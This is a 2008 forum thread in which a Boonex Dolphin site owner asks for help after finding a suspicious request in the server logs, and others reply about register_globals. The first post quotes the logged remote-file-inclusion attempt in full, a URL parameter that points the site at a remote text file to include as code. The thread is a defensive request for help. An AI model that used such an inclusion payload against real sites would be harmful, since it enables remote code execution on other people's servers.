Security Question

Hello. I have checked the server access logs and found that someone trying to connect my server probably for malicious reasons. Below is the URL.

 

example.com//?sIncPath=http://www.irontonforge.com/McN/readme.txt??

I have searched sIncPath on Google and found it is related to a script.

 

http://heapoverflow.com/f0rums/public/7119-boonex-ray-3-5-sincpath-remote-file-inclusion-vulnerability.html

 

I am 6.1 Dolphin user. I dont know much about those security issues. Could you inform me about this problem? Everything seems OK for now on my site but what can I do for the issue?

 

Thanks.

Quote · 19 Nov 2008

Hello. I have searhed found Sammie's fix. Now probably future attempts will not create problems but how can I be sure previous attempts didn't create any malicious result. For now my site is working good.

Quote · 20 Nov 2008

If you will read about security, you will understand that if you will have

register_globals in Off state

it will impossible to reassign any variables with new values that was received by GET params.

Quote · 21 Nov 2008

Thanks for the reply. register globals is off on my server. But I have checked this problem on the forum and even when register globals is off the exploit works according to some people. Somehow /inc/header.inc.php chmod was 666 so I thought it would be because of the exploit.

Quote · 24 Nov 2008
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.